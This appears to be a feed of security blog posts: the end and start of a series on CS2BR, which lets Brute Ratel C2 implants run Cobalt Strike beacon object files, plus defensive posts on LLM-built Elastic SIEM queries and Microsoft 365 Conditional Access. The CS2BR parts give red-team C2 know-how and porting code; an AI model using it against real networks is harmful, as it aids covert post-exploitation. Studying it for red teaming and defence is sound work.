The resulting base64 encoded argument buffer, DgAAAGJsb2cubnZpc28uZXUACAAAADguOC44LjgAAQA=, can then be passed to BRC4’s coffexec command and will be processed by CS2BR’s custom entrypoint and forwarded to the original BOF’s logic:

Running a patched BOF with generated input arguments
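For reference, the layout of this “zzs” buffer can be reproduced in a few lines of Python. This is only an illustration of the packing format — the pack_z/pack_s helpers below are ours and not part of CS2BR:

import base64
import struct

def pack_z(value: str) -> bytes:
    # "z": null-terminated string, prefixed with its 4-byte little-endian length
    data = value.encode() + b"\x00"
    return struct.pack("<I", len(data)) + data

def pack_s(value: int) -> bytes:
    # "s": 2-byte little-endian integer
    return struct.pack("<H", value)

buffer = pack_z("blog.nviso.eu") + pack_z("8.8.8.8") + pack_s(1)   # format "zzs"
print(base64.b64encode(buffer).decode())
# DgAAAGJsb2cubnZpc28uZXUACAAAADguOC44LjgAAQA=

Decoding the base64 string shown above yields exactly this buffer: two length-prefixed, null-terminated strings followed by a 2-byte integer.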

III. Where to go from here

Working on CS2BR has been a lot of fun and, frankly, also quite frustrating at times. After all, BRC4 isn’t an easy target system to develop for due to its black-box nature. This project has come a fairly long way nonetheless!

Conclusion

This blog post showed how CS2BR works and how it can be used. At this point, the tool allows you to run all your favorite open-source CS BOFs via BRC4. So in case you are used to a BOF-heavy workflow in CS and intend to switch to BRC4, now you got the tools to keep using the same BOFs.

Using CS2BR is straight-forward and doesn’t require special skills or knowledge for the most part. There are some caveats to it that should be considered before using it “in production” though:

  • Source code: CS2BR works only on a source code level. If you want to patch a BOF that you don’t have the source code for, this tool won’t be of much use to you.
  • API completeness: CS2BR does not (yet) support all of CS’s BOF C API: namely, the Internal APIs are populated with stubs only and won’t do anything. This mainly concerns BOFs utilizing CS’ user impersonation and process injection BOF API capabilities.
  • Usability: While CS2BR allows you to pass parameters to BOFs, you’ll still have to work out the number and types of parameters yourself by dissecting your BOF’s CNA. You’ll only need to figure this out once, but it’s a certain investment nonetheless.
  • Binary overhead: Patching the compatibility layer into source code results in more code getting generated, thus increasing the size of the compiled BOF. Also note that the compatibility layer code can get signatured in the future and thus become an IOC.

I’m convinced that most of those points don’t constitute actual practical problems, but rather academic challenges to tackle in the future. Overall, I think the benefit of being able to run CS BOFs in BRC4 outweighs CS2BR’s drawbacks.

Outlook

While I’m happy with the current implementation, I’m convinced it can be improved upon. Expect a third, final blog post about the next iteration of CS2BR. What is it going to be about, I hear you ask? Well, let me use a meme to tease you:

Teasing the next and final (?) blog post about CS2BR
That's me!

Moritz Thomas

Moritz is a senior IT security consultant and red teamer at NVISO.
When he isn’t infiltrating networks or exfiltrating data, he is usually knees deep in research and development, working on new techniques and tools in red teaming.

Transforming search sentences to query Elastic SIEM with OpenAI API

30 May 2023 at 09:48

(In this blog post, we will demonstrate a proof of concept on how to use an OpenAI Large Language Model to craft Elastic SIEM queries in an automated way. Be mindful of issues with accuracy and privacy before trying to replicate this proof of concept. More info in our discussion at the bottom of this article.)

Introduction
The primary task of a security analyst or threat hunter is to ask the right questions and then translate them into SIEM query languages, like SPL for Splunk, KQL for Sentinel, and DSL for Elastic. These questions are designed to provide answers about what actually happened. For example: “Identify failed login attempts, Search for a specific user’s login activities, Identify suspicious process creation, Monitor changes to registry keys, Detect user account lockouts, etc.”

The answers to these questions will likely lead to even more questions. Analysts will keep interrogating the SIEM until they get a clear answer. This allows them to piece together a timeline of all the activities and explain whether it is a false positive or an actual incident. To do this, the analysts need to know a bunch of things. First, they need to be familiar with several types of attacks. Next, they need to understand the infrastructure (cloud systems, on-premises, applications, etc.). And on top of all that, they must learn how to use these SIEM tools effectively.

Is GPT-3 capable of generating Elasticsearch DSL queries?
In this blog post, we will explore how a powerful language model by OpenAI can automate the last step and bridge the gap between human language questions and SIEM query language.

We will be presenting a brief demo of a custom chat web app that allows users to query Windows event logs using natural language and obtain results for incident handling. In our example, we used the TextDavinci-3 model from OpenAI and Elastic as a SIEM. We built the custom chat app, using vanilla JS for the client and NodeJS for the backend.

Architecture
In our design, we send the analyst’s question to OpenAI using their API within a custom prompt. Subsequently, the resulting Elastic query is sent to the Elastic SIEM using its API. Lastly, the result from Elastic is returned to the user.

chat app openai api with elastic siem
Web app diagram

A: User asking in the chat
B: The web app sends the initial input, enhanced with a standard phrase, to guide the model in generating more relevant and coherent responses.
C: It gets back the response: corresponding Elasticsearch query
D: The web app sends the query to Elasticsearch, after some checks
E: Elasticsearch sends back the result to web app
F: Present the results to the user in table format

Demo

In this demo, we focused on querying a specific log source, namely the “winlogbeat” index. However, it is indeed possible to expand the scope of the query by incorporating a broader index pattern that includes a wider range of log sources, such as “Beats-*” (if we are utilizing Beats for log collectors). Another approach would be to perform a search across all available sources, assuming the implementation of the Elastic Common Schema (ECS) within Elasticsearch. For instance, if we have different log types, such as Windows event logs, Checkpoint logs, etc. and we want to retrieve these logs from a specific host name, we can utilize the “host.name” key in each log source (index). By specifying the desired host name, we can filter the logs and retrieve the relevant information from the respective log sources.

ecs example
Working with ECS
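To illustrate, such an ECS-based query could look as follows (expressed here as a Python dict; the host name and index pattern are just examples):

# Latest 10 events for a given host across all ECS-compliant log sources.
query = {
    "query": {
        "bool": {
            "filter": [
                {"term": {"host.name": "WIN-SOTO"}}
            ]
        }
    },
    "sort": [{"@timestamp": {"order": "desc"}}],
    "size": 10,
}
# Running this against a broad index pattern such as "winlogbeat-*,checkpoint-*"
# returns the matching events from every source that maps its host field to ECS.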

Deep dive
Below, we will go into detail on how we built the application.
To create this web app, the first thing we need is an API key from OpenAI. This key will give us access to the GPT-3 models and their functionalities.

create openai api key
Creating OpenAI API key

Next, we will utilize the OpenAI playground to experiment and interact with the TextDavinci-3 model. In this particular example, we made an effort to craft an optimal prompt that would yield the most desirable responses. Fortunately, the TextDavinci-3 model proved to be the ideal choice, providing us with excellent results. Also, the OpenAI API allows you to control the behavior of the language model by adjusting certain parameters:

  • Temperature: The temperature parameter controls the randomness of the model’s output. A higher temperature, like 0.8, makes the output more creative and random, while a lower temperature, like 0.1, makes it more focused and deterministic.
  • Max Tokens: The max tokens parameter allows you to limit the length of the model’s response. You can set a specific number of tokens to restrict the length of the generated text. Be aware that setting an extremely low value may result in the response being cut off and not making sense to the user.
  • Frequency Penalty: The frequency penalty parameter allows you to control the repetitiveness of the model’s responses. By increasing the frequency penalty (e.g., setting it to a value higher than 0), you can discourage the model from repeating the same phrases or words in its output.
  • Top P (Top Probability): The top_p parameter, also known as nucleus sampling or top probability, sets a threshold for the cumulative probability distribution of the model’s next-word predictions. Instead of sampling from the entire probability distribution, the model only considers the most probable tokens whose cumulative probability exceeds the top_p value. This helps to narrow down the possibilities and generate more focused and coherent responses.
  • Presence Penalty: The presence penalty parameter allows you to encourage or discourage the model from including specific words or phrases in its response. By increasing the presence penalty (e.g., setting it to a positive value), you can make the model avoid certain words or topics. Conversely, setting a negative value can encourage the model to include specific words or phrases.

Following that, we can proceed to export the code based on the programming language we are using for our chat web app. This will allow us to obtain the necessary code snippets tailored to our preferred language.

playground openai
OpenAI Playground code snippet

Also, it is worth mentioning that we stumbled upon an impressive attempt at dsltranslate.com, where you can check how ChatGPT translates a search sentence into an Elasticsearch DSL query (or even SQL).

Returning to our experimental use case, our web app consists of two components: the client side and the server side. On the client side, we have a chat user interface (UI) where users can input their questions or queries. These questions are then sent to the server side for processing.

client custom chat app elasticsearch openaiai
UI chat

On the server side, we enhance the user’s questions by combining them with a predefined text to create a prompt. This prompt is then sent to the OpenAI API for processing and generating a response.

prompt send to openai
Backend code snippet- prompt OpenAI api

Once we receive the response, we perform some basic checks, such as verifying if it is a valid JSON object, before forwarding the query to our SIEM API, which in this case is Elastic. Finally, we send the reply back to the client by transforming the JSON response into an HTML table format.
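Our implementation uses vanilla JS and NodeJS, but the same flow can be sketched in a few lines of Python for illustration. Note that this is a simplified, unofficial sketch: the prompt text, model parameters and Elastic credentials are placeholders, and the legacy openai 0.x completion interface and the elasticsearch Python client are assumed:

import json
import openai                               # pip install openai (legacy 0.x interface assumed)
from elasticsearch import Elasticsearch     # pip install elasticsearch

openai.api_key = "YOUR_OPENAI_API_KEY"                                             # placeholder
es = Elasticsearch("https://localhost:9200", basic_auth=("elastic", "changeme"))   # placeholder

PROMPT = ("Translate the following question into a valid Elasticsearch DSL query "
          "for Windows event logs in the winlogbeat-* index. Answer with JSON only.\n"
          "Question: {question}\nQuery:")

def question_to_query(question: str) -> dict:
    response = openai.Completion.create(
        model="text-davinci-003",       # the TextDavinci-3 model used in the playground
        prompt=PROMPT.format(question=question),
        temperature=0.1,                # keep the output focused and deterministic
        max_tokens=512,
    )
    text = response["choices"][0]["text"].strip()
    return json.loads(text)             # basic check: the reply must be valid JSON

def ask(question: str):
    query = question_to_query(question)
    return es.search(index="winlogbeat-*", body=query)  # the UI renders this as an HTML table

print(ask("show me the last 5 failed logon attempts"))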

Discussion
But many of the responses from OpenAI API are not correct…
You are absolutely right. Not all responses from the OpenAI API can be guaranteed to be correct or accurate. Fine-tuning the model is a valuable approach to improve the accuracy of the generated results.

Fine-tuning involves training the pre-trained language models like GPT-3 and TextDavinci-3 on specific datasets that are relevant to the desired task or domain. By providing a training dataset specific to our use case, we can enable the model to learn from and adapt to the context, leading to more accurate and tailored responses.

To initiate the fine-tuning process, we would need to prepare a training dataset comprising a minimum of 500 examples in any text format. This data set should cover a diverse range of scenarios and queries related to our specific use case. By training the model on this dataset, we can enhance its performance and ensure that it generates more accurate and contextually appropriate responses for our application.
Example:

{"prompt": "show me the last 5 logs from the user sotos", "completion": " {\n\"query\": {\n    \"match\": {\n..... "}
{"prompt": "...........", "completion": "................."}
....

Even if we invest efforts in fine-tuning the model and striving for improvement, it is important to acknowledge that new versions and functionalities are regularly integrated into the Elasticsearch query language. It is worth noting that ChatGPT’s knowledge is limited to information available up until September 2021. Similar to numerous companies, Elastic has recently developed a plugin that enables ChatGPT to tap into Elastic’s up-to-date knowledge base and provide assistance with the latest features introduced by Elastic.

Everything seems perfect so far, but…what about security and privacy of data?

Indeed, privacy and security are important concerns when dealing with sensitive data, especially in scenarios where queries or requests might expose potentially confidential information. In the described scenario, the actual logs are not shared with OpenAI, but the queries themselves reveal certain information, such as specific usernames or host names (ex. “find the logs for the user mitsos” or “show me all the failed logon attempts from the host WIN-SOTO.”).

In accordance with the data usage policies of OpenAI API (in contrast to ChatGPT), it refrains from utilizing the data provided through its API to train its models or enhance its offerings. It is worth noting, however, that data transmitted to their APIs is handled by servers situated in the United States, and OpenAI retains the data you submit via the API for a period of up to 30 days for the purpose of monitoring potential abuses. Nevertheless, OpenAI grants you the ability to choose not to participate in this monitoring, thereby ensuring that your data remains neither stored nor processed. To exercise this option, you can make use of the provided form. Consequently, each API call initiates and concludes your data’s lifecycle. The data is transmitted through the API, and the API call’s response contains the resulting output. It does not retain or preserve any data transmitted during successive API requests.

In conclusion, by leveraging OpenAI’s language processing capabilities, organizations can empower security analysts to express their query intentions in a natural language format. This approach streamlines the SIEM query creation process, enhances collaboration, and improves the accuracy and effectiveness of security monitoring and incident response. With OpenAI’s assistance, bridging the gap between human language and SIEM query language becomes an achievable reality in the ever-evolving landscape of cybersecurity. Last but not least, the privacy issue surrounding ChatGPT and OpenAI API usage raises a significant point that necessitates thoughtful consideration, before creating new implementations.


Nikos Samartzopoulos

Nikos is a Senior Consultant in the SOC Engineer Team. With a strong background in data field and extensive knowledge of Elastic Stack, Nikos has cultivated his abilities in architecting, deploying, and overseeing Elastic SIEM systems that excel in monitoring, detecting, and swiftly responding to security incidents.

Enforce Zero Trust in Microsoft 365 – Part 3: Introduction to Conditional Access

24 May 2023 at 07:00

This blog post is the third blog post of a series dedicated to Zero Trust security in Microsoft 365.

In the first two blog posts, we set the basics by going over the free features of Azure AD that can be implemented in an organization that starts its Zero Trust journey in Microsoft 365. We went over the Security Defaults, the per-user MFA settings and some Azure AD settings that allowed us to improve our default security posture when we create a Microsoft 365 environment.

Previous blog posts:

Introduction

In this blog post, we will see what Azure AD Conditional Access is, how it can be used to further improve security and introduce its integration capabilities with other services.

As a reminder, our organization has just started with Microsoft 365. However, we have decided to go for Microsoft 365 for our production environment. Therefore, we want to have a look at a more advanced feature, Azure AD Conditional Access policies. This feature requires an Azure AD Premium P1 license which comes as a standalone license or which is also included in some Microsoft 365 licenses (Microsoft 365 E3/A3/G3/F1/F3, Enterprise Mobility & Security E3, Microsoft 365 Business Premium, and higher licenses). Note that one license should be assigned to each user in scope of any Conditional Access policies.

Azure AD Conditional Access allows organizations to use identity-driven signals to make decisions and enforce policies. Policies can be seen as if-then statements. For instance, if a user wants to access SharePoint Online, which is a Microsoft cloud application that can be integrated in such policies, the user, or more specifically the user’s request, is required to meet specific requirements defined in those policies. Let’s now see what the capabilities of those policies are.

Conditional Access

This part will be more theoretical to make sure everyone has the basics. Therefore, if you are already familiar with Azure AD Conditional Access policies, you can directly jump to the next section for the implementation, where we go over some prerequisites and important actions that need to be taken to avoid trouble when setting up those policies, based on our hands-on experience.

Conditional Access signals

As we have seen, signals will be considered to make a decision. It is possible to configure the following signals:

  • User, group membership or workload identities (also known as service principals or managed identities in Azure): It is possible to target or exclude specific users, groups, or workload identities from a Conditional Access policy;
  • Cloud apps or actions: Specific cloud applications such as Office 365, the Microsoft Azure Management, Microsoft Teams applications, etc. can be targeted by a policy. Moreover, specific user actions like registering security information (registering to MFA or Self-Service Password Reset) or joining devices can be included as well. Finally, authentication context can also be included. Authentication contexts are a bit different as they can be used to protect specific sensitive resources accessed by users or user actions in the environment. We will discuss authentication contexts in details in later blog post;
  • Conditions: With an Azure AD Premium P1 license, specific conditions can be set. This includes:
    • The device platforms: Android, iPhone, Windows Phone, Windows, macOS and Linux;
    • The locations: Conditional Access works with Named Locations which can include country/countries or IP address(es) that can be seen as trusted or untrusted;
    • The client apps: client apps which support modern authentication: Browser and Mobile apps and desktop clients; and legacy authentication clients: Exchange ActiveSync clients and other clients;
    • Filter for devices: allows to target or exclude devices based on their attributes such as compliance status in the device management solution, if the device is managed in Microsoft Endpoint Manager or on-premises, or registered in Azure AD, as well as custom attributes that have been set on devices;
    • Note that these conditions need to be all matched for the policy to apply. If a condition such as the location is excluded and match an attempt to access an application, the policy will not apply. Finally, if multiple policies matched, they will all apply, and access controls will be combined (the most restrictive action will be applied in case of conflicts).

Conditional Access access controls

Then, we have the access controls which are divided into two main categories, the “grant” and the “session” controls. These access controls define the “then do this” part of the Conditional Access policy (if all conditions have matched as mentioned previously). They can be used to allow or block access, require MFA, require the device to be compliant or managed as well as other more specific controls.

Grant controls

  • Block access: if all conditions have matched, then block access;
  • Grant access: if all conditions have matched, then grant access and optionally apply one or more of the following controls:
    • No controls are checked: Single-Factor Authentication is allowed, and no other access controls are required;
    • Require Multi-Factor Authentication;
    • Require authentication strength: allows to specify which authentication method is required for accessing the application;
    • Require device to be marked as compliant: this control requires devices to be compliant in Intune. If the device is not compliant, the user will be prompted to make the device compliant;
    • Require Hybrid Azure AD joined devices: this control requires devices to be hybrid Azure AD joined meaning that devices must be joined from an on-premises Active Directory. This should be used if devices are properly managed on-premises with Group Policy Objects or Microsoft Endpoint Configuration Manager, formerly SCCM, for example;
    • Require approved client apps: approved client apps are defined by Microsoft and represent applications that supports modern authentication;
    • Require app protection policy: app protection policies can be configured in Microsoft Intune as part of Mobile Application Management. This control does not require mobile devices to be enrolled in Intune and therefore work with bring-your-own-device (BYOD) scenarios;
    • Require password change;
    • For multiple controls (when multiple of the aforementioned controls are selected):
      • Require all the selected controls;
      • Require one of the selected controls.

Session controls

  • Use app enforced restrictions: app enforced restrictions require Azure AD to pass device information to the selected cloud app to know if a connection is from a compliant or domain-joined device to adapt the user experience. This control only works with Office 365, SharePoint Online and Exchange Online. We will see later how this control can be used;
  • Use Conditional Access App Control: this is the topic of a later blog post, but it allows to enforce specific controls for different cloud apps with Microsoft Defender for Cloud Apps;
  • Sign-in frequency: this control defines how often users are required to sign in again every (x hours or days). The default period is 90 days;
  • Persistent browser session: when a persistent session is allowed, users remain signed in even after closing and reopening their browser window;
  • Customize continuous access evaluation: continuous access evaluation (CAE) allows access tokens to be revoked based on specific critical events in near real time. This control can be used to disable CAE. Indeed, CAE is enabled by default in most cases (CAE migration);
  • Disable resilience defaults: when enabled, which is the case by default, this setting allows to extend access to existing session while enforcing Conditional Access policies. If the policy can’t be evaluated, access is determined by resilience settings. On the other hand, if disabled, access is denied once the session expires;
  • Require token protection for sign-in sessions: this new capability has been designed to reduce attacks using token theft (stealing a token, hijacking or replay attack) by creating a cryptographically secure tie between the token and the device it is issued to. At the time of writing, token protection is in preview and only supports desktop applications accessing Exchange Online and SharePoint Online on Windows devices. Other scenarios will be blocked. More information can be found here.

Conditional Access implementation

Before getting started with the implementation of Conditional Access policies, there are a few important considerations. Indeed, the following points might determine if our Zero Trust journey is a success or a failure in certain circumstances.

Per-user MFA settings

If you decided to go for the per-user MFA settings during the first blog post, you might consider the following:

  • As mentioned before, Conditional Access policies can be used to enforce a sign-in frequency. However, this can also be achieved using the ‘remember multi-factor authentication’ setting. If both settings are configured, the sign-in frequency enforced on end users will be a mix of both configurations and will therefore lead to prompting users unexpectedly;
  • If trusted IPs, which require an Azure AD Premium P1 license, have been configured in the per-user MFA settings, they will conflict with named locations in Azure AD Conditional Access. Named locations allow you to define locations based on countries or IP address ranges that can then be used to allow or block access in policies. Besides that, if possible, named locations should be used because they allow more fine-grained configurations as they do not automatically apply to all users and in all scenarios;
  • Finally, before enforcing MFA with Conditional Access policies, all users should have their MFA status set to disabled.

Security Defaults

Moreover, if you opted for the Security Defaults, it needs to be disabled as they can’t be used together.

How and where to start?

Now that we have some concepts about Conditional Access and some considerations for the implementation, we can start with planning the implementation of our policies. First, we need to ensure that we know what we want to achieve and what the current situation is. In our case, we first want to enforce MFA for all users to prevent brute force and protect against simple phishing attacks.

However, there might be some user accounts used as services accounts in our environment, such as the on-premises directory synchronization account for hybrid deployments, which can’t perform multi-factor authentication. Therefore, we recommend identifying these accounts and excluding them from the Conditional Access policy. However, because MFA would not be enforced on these accounts, they are inherently less secure and prone to brute force attacks. For that purpose, Named Locations could be used to only allow these service accounts to login from a defined trusted location such as the on-premises network (this now requires an additional license for each workload identity that you want to protect: Microsoft Entra Workload Identities license). Except for the directory synchronization account, we do not recommend the use of user accounts as service accounts. Other solutions are provided by Microsoft to manage applications in Azure in a more secure way.

Our first policy could be configured as follows (note that using a naming convention for Conditional Access policies is a best practice as it eases management):

1. Assign the policy to all users (which includes all tenant members as well as external users) and exclude service accounts (emergency/break-the-glass accounts might also need to be excluded):

Conditional Access policy assignments
Assignments

2. Enforce the policy for all cloud applications:

Cloud applications
Cloud applications

3. Require MFA and enforce a sign-in frequency of 7 days:

Access controls
Access controls

4. Configure the policy in report-only first

Report-only mode
Report-only mode

We always recommend configuring Conditional Access policies in report-only mode before enabling them. The report-only feature will generate logs the same way as if the policies were enabled. This will allow us to assess any potential impact on service accounts, on users, etc. After a few weeks, if no impact has been discovered, the policy can be switched to ‘On’. Note that there might be some cases where you may want to shorten or even skip this validation period.

These logs can be easily accessed in the ‘Insights and reporting‘ panel in Conditional Access:

Conditional Access Insights and reporting
Conditional Access Insights and reporting
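
As a side note, the same policy can also be managed as code through the Microsoft Graph conditional access API. The sketch below is only an illustration and assumes you already obtained a Graph access token with the Policy.ReadWrite.ConditionalAccess permission; the display name and excluded object IDs are placeholders:

import requests

ACCESS_TOKEN = "<graph-access-token>"           # placeholder, e.g. obtained via MSAL
policy = {
    "displayName": "CA001 - Require MFA for all users",
    "state": "enabledForReportingButNotEnforced",    # report-only mode
    "conditions": {
        "users": {
            "includeUsers": ["All"],
            "excludeUsers": ["<service-account-object-id>", "<break-glass-account-object-id>"],
        },
        "applications": {"includeApplications": ["All"]},
    },
    "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
    "sessionControls": {
        "signInFrequency": {"isEnabled": True, "type": "days", "value": 7}
    },
}

response = requests.post(
    "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies",
    headers={"Authorization": f"Bearer {ACCESS_TOKEN}"},
    json=policy,
)
response.raise_for_status()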

Conclusion

In this third blog post, we learned about Conditional Access policies by going over a quick introduction on Conditional Access signals and access controls. Then, we went over some implementation considerations to make sure our Zero Trust journey is a success by preventing unexpected behaviors and any impact on end users. Finally, we implemented our very first Conditional Access policy to require Multi-Factor Authentication on all users except on selected service accounts (which is not the best approach as explained above).

If you are interested in knowing how NVISO can help you plan your Conditional Access policy deployment and/or support you during the implementation, feel free to reach out or to check our website.

In my next blog post, we will see which policies can be created to enforce additional access controls without requiring user devices to be managed in Intune to further protect our environment.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Introducing CS2BR pt. I – How we enabled Brute Ratel Badgers to run Cobalt Strike BOFs

15 May 2023 at 07:00

If you know all about CS, BRC4 and BOFs you might want to skip this introduction and get right into the problem statement. You can also jump right to the solution.

Introduction

When we conduct Red Team assessments at NVISO, we employ a wide variety of proprietary and open source tools. One central component in these assessments is the command & control (C2) framework we use to remotely interact with compromised machines and move laterally through our targets’ networks. They usually feature a C2 server for central access, implants (analogous to bots in botnets) that execute commands, and client interfaces that allow red team operators to interact with the implants. Among others, there are two popular C2 frameworks that we use: Cobalt Strike and Brute Ratel C4.

Both C2s are proprietary and they have a lot of features in common. A particular capability they share is execution of beacon object files (BOFs). Normally you work with object files during compilation of C and C++ programs as they contain the compiled code of individual C/C++ source files and are not directly executable.

CS and BRC4 provide a mechanism to send BOFs to implants and execute their code on the remote machines. And the best thing about it is: one can write their own BOFs and have implants execute them. This comes with quite a set of benefits:

  • Implants don’t need to implement a lot of capabilities as those capabilities can be streamed and executed on demand, reducing the implant’s footprint.
  • Using custom BOFs, operators have finer control over the exact way an implant interacts with the target system. They can choose to implement new features or operate more covertly and OPSEC-safe.
  • While the C2s might be proprietary, BOFs can be open-source and shared with everyone.

There are many open-source BOFs available, such as TrustedSec’s CS-Situational-Awareness, that can easily be used in various C2s like CS and Sliver. Nearly all of these BOFs use Cobalt Strike’s de-facto BOF API standard – which isn’t compatible with Brute Ratel’s BOF API. Thus, the vast majority of available BOFs are incompatible with BRC4.

Turns out there are only very few BRC4 BOFs!

In this blog post, we present an approach to solve this problem that enables Brute Ratel’s implants (“badgers”) to run BOFs written for Cobalt Strike. The tool we developed based on this approach will be presented in a follow-up blog post.

I. So what’s the exact problem?

In theory any BOF can be executed by either C2 framework so long as they don’t make any use of the C2-specific APIs. Practically, this doesn’t make much sense since using these APIs is required for basic tasks such as sending back information to operators.

The following paragraphs break down both BOF APIs in order to help understand how they’re incompatible.

Cobalt Strike’s BOF C API

Cobalt Strike BOF C API

Cobalt Strike splits its APIs into roughly four distinct groups:

  • Data Parser API: provides utilities to parse data passed to the BOF. This allows BOFs to receive arbitrary data as input, such as regular string-based values but also arbitrary binary data like files.
  • Output API: lets BOFs output raw buffers and format output. The output is sent back to operators.
  • Format API: allows BOFs to format output in buffers for later transmission.
  • Internal APIs: feature several utilities related to user impersonation, privileges and process injection. BRC4 doesn’t currently have an equivalent API.

Furthermore, the signature of CS BOF entrypoints is void go(char*, int), which explicitly expects binary data to be passed in and consumed through the Data Parser API.
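
As an illustration (our own minimal example, not taken from the CS documentation), a CS BOF that unpacks a single operator-supplied string and echoes it back could look like this:

#include <windows.h>
#include "beacon.h"

// Minimal illustrative CS BOF: unpack one packed string argument and echo it back.
void go(char* args, int len) {
	datap parser;
	BeaconDataParse(&parser, args, len);            // Data Parser API: wrap the packed argument blob
	char* name = BeaconDataExtract(&parser, NULL);  // extract the first (string) field
	BeaconPrintf(CALLBACK_OUTPUT, "Hello, %s!\n", name ? name : "operator"); // Output API
}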

Brute Ratel C4’s BOF C API

Brute Ratel BOF C API

Brute Ratel C4’s API on the other hand comes as a loose list that I grouped in this diagram for simplicity:

  • Output API: contains output printf-like functions for regular ANSI-C strings and wide-char strings.
  • String API: features various strlen and strcmp functions for regular ANSI-C strings and wide-char strings.
  • Memory API: provides convenient memory-related functions for allocating, freeing, copying and populating buffers.

The signature of BRC4 BOF entrypoints is void coffee(char**, int, WCHAR**) and explicitly expects string-based inputs (similar to a regular executable’s main(int argc, char* argv[])).
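
For comparison, a minimal BRC4 BOF doing roughly the same thing could look like this (again an illustrative sketch of ours, using the BadgerDispatch function from badger_exports.h that we will also see later in this post):

#include <windows.h>
#include "badger_exports.h"

// Minimal illustrative BRC4 BOF: arguments arrive as plain strings and
// output is sent back through the dispatch pointer.
VOID coffee(char** Args, int len, WCHAR** dispatch) {
	if (len > 0) {
		BadgerDispatch(dispatch, "Hello, %s!\n", Args[0]);
	} else {
		BadgerDispatch(dispatch, "Hello, operator!\n");
	}
}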

Comparison & Conclusion

When comparing their APIs, it becomes apparent that CS and BRC4 follow different approaches to their APIs:

  • While both C2s provide some convenience APIs, Cobalt Strike’s APIs feature a higher abstraction level. As a result, CS doesn’t only feature an API dedicated to output (as does BRC4) but also one for formatting output.
  • CS provides advanced APIs (e.g. the “internal” ones) while BRC4 provides mostly low-level APIs.
  • Both differ greatly in their approach to passing inputs to BOFs: Cobalt Strike allows passing arbitrary binary data and provides a separate API for this task while BRC4 sticks to the traditional main entrypoint and its GUI only allows operators to pass strings to BOFs.
CS BOFs are (almost) the same as BRC4 BOFs - or at least BRC4 would like you to think that.

Actually, BRC4’s documentation makes porting BOFs from CS to BRC4 look like an easy task. Simply trying to map CS’s BOF API to BRC4’s shows that this is a more intricate task:

Cobalt Strike and Brute Ratel C4 BOF API mapping

As you can see, there are only very few CS APIs that (more or less) can be mapped to BRC4’s APIs. What are the implications for porting CS BOFs to BRC4 then? Well, it’s going to require some engineering.

II. Working out a solution

Now that we know how BRC4’s and CS’s BOF APIs differ from each other, we can work out a solution. Well, I’d love to tell you that that was the approach I took: read up on the problem’s intricacies first and then work out a well-structured and thought-out solution. Things went a little differently though, and I’d like to show you.

Approach 1: The naïve way

My first approach at porting BOFs from CS to BRC4 was based on the BRC4 documentation and involved only three steps:

  • Replace the go(char*, int) entrypoint with coffee(char**, int, WCHAR**).
  • Remove CS API imports (“beacon.h”) and add BRC4 API imports (“badger_exports.h”).
  • Replace uses of CS APIs with BRC4 APIs.

That looks easy to do! So let’s test this using the DsGetDcNameA example they posted in the documentation:

BRC4 DsGetDcNameA BOF

Nice, that worked very well! How about a real-world example of an open-source BOF: Outflank’s Winver BOF grabs the exact Windows version of the victim machine. Again, we replace the entrypoint, API imports and API uses:

#include "badger_exports.h"

//snip

VOID coffee(char** Args, int len, WCHAR** dispatch) {
	// snip
	dwUBR = ReadUBRFromRegistry();
	if (dwUBR != 0) {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u.%u\n", chOSMajorMinor, pPEB->OSBuildNumber, dwUBR);
	}
	else {
		BadgerDispatch(dispatch, "Windows version: %ls, OS build number: %u\n", chOSMajorMinor, pPEB->OSBuildNumber);
	}
	
	return;
}
Common output with BOFs: not much to work with!

Running this gives us… nothing! This is a problem you’ll encounter when working with BOFs: you won’t receive any feedback when they aren’t executed or crash, making debugging and identifying the root cause just a bit harder.

But what was the problem in this case? Well, I got stuck for a bit at this point and after digging into the compiled BOF I noticed that there were WinAPI calls in the code that were not explicitly declared as imports:

DWORD ReadUBRFromRegistry() {
	//snip
	_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
		GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");

Cobalt Strike’s BOF documentation says that “GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are available within BOF files” and don’t need to be explicitly imported by BOFs. This doesn’t apply to BRC4 though so imports for those need to be added:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleA (LPCSTR lpModuleName);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleW (LPCWSTR lpModuleName);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryW (LPCWSTR lpLibFileName);
WINBASEAPI BOOL  WINAPI KERNEL32$FreeLibrary (HMODULE hLibModule);

#ifdef GetProcAddress
#undef GetProcAddress
#endif
#define GetProcAddress KERNEL32$GetProcAddress
#ifdef GetModuleHandleA
#undef GetModuleHandleA
#endif
#define GetModuleHandleA KERNEL32$GetModuleHandleA
#ifdef GetModuleHandleW
#undef GetModuleHandleW
#endif
#define GetModuleHandleW KERNEL32$GetModuleHandleW
#ifdef LoadLibraryA
#undef LoadLibraryA
#endif
#define LoadLibraryA KERNEL32$LoadLibraryA
#ifdef LoadLibraryW
#undef LoadLibraryW
#endif
#define LoadLibraryW KERNEL32$LoadLibraryW
#ifdef FreeLibrary
#undef FreeLibrary
#endif
#define FreeLibrary KERNEL32$FreeLibrary

Note that the macros allow us to leave the original function calls in the BOF untouched. If we didn’t do that, we would need to prepend KERNEL32$ to every call of the functions listed above.

After adding those and recompiling, we can run the BOF again and now it runs just fine:

Running a CS BOF in BRC4 after adding default imports

That’s great! However, this approach is pretty limited. Let’s have a look at some of its shortcomings.

Caveat

The naïve approach works great for very simple BOFs that don’t use any of CS’s higher-level APIs. Many of the advanced BOFs use some of those APIs though.

Let’s examine TrustedSec’s sc_enum as it’s a very useful BOF and a great example: it allows an operator to enumerate Windows services on a target machine. If we were to apply our simple 3-step approach again, we’d hit a roadblock:

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
